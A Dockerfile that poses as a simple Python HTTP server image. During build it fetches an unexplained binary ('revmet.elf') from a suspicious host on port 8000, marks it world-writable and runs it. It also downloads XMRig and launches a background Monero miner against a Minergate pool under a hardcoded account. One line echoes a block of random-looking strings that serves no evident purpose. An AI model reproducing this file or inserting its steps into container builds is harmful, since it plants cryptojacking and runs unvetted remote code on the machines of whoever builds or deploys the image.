FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo KyMuVYnQSVrxs5zAV7CAFTlZwnBOMtuQ HiTBNdfgLTapVSOwaWUwiIPph4CbshR7 1tvnx3UJMYZndehxYSwthsBLTwpKkfbR yoHRshBvwgWr1cTcUjE748E3qZKl3c0g kQAXOzbnGkBVi3gXMWZ4Rv184mwOwsdt neCpoiPTYL9JHXF98R36BDpa95GH9Yew MbdHYnn5qESlUf7YIc7S8do9CsAig7JK XEa59Z83DCjYUE0XsYx4x2ZWdmdJcALR Nq3VSe2KfF3C9zDhYCxfoptCpBHagml0 44Pg16uETM5cpEi0oBg7X5YkuEncawnp mztzQJ94SqcEsva0TOfyFyPsw2hWdg4Z DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]